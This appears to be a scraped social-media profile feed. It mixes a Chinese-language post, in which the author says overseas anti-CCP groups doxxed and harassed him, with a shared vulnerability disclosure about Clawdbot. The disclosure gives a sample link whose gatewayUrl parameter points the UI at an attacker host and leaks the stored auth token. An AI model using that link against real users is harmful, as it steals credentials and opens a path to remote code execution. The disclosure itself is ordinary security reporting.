Jacky Li
186 posts

Jacky Li
@jli022
Keep up with the latest in Chinese AI @overnightai


Giving people agentic AI be like …


A world of abundant creation flooding finite human attention shifts the game from building to being noticed.

我出国这几年的感受是,得罪共产党没那么可怕,共产党是个组织,多少有些底线。当年中共对赖昌星,也不过是派人对其劝返,并没有上什么黑手段。 但海外那些满嘴正义的反共群体,却毫无底线。 开盒我的个人信息,网上悬赏8万美元要我的命,曝光我们公司地址,指使他人到我们公司地址来骚扰。通过法轮功议员给内阁总理大臣举报,动员大爷大妈上街发传单喊口号,围攻东京地方裁判所。上特定报纸头条,通过滥诉让我忙不胜忙,天价索赔让我出不起律师费。没有精力做节目。 我刚出来的时候曾经讲过一句话,这些人都是比中共坏一百倍的群体。他们要是掌权,中华民族将万劫不复。 苍天有眼,天佑中华,他们全都被赶到海外去了。我挡一挡这些魑魅魍魉们的子弹,也算是我以我血荐轩辕了。






🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link. The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…











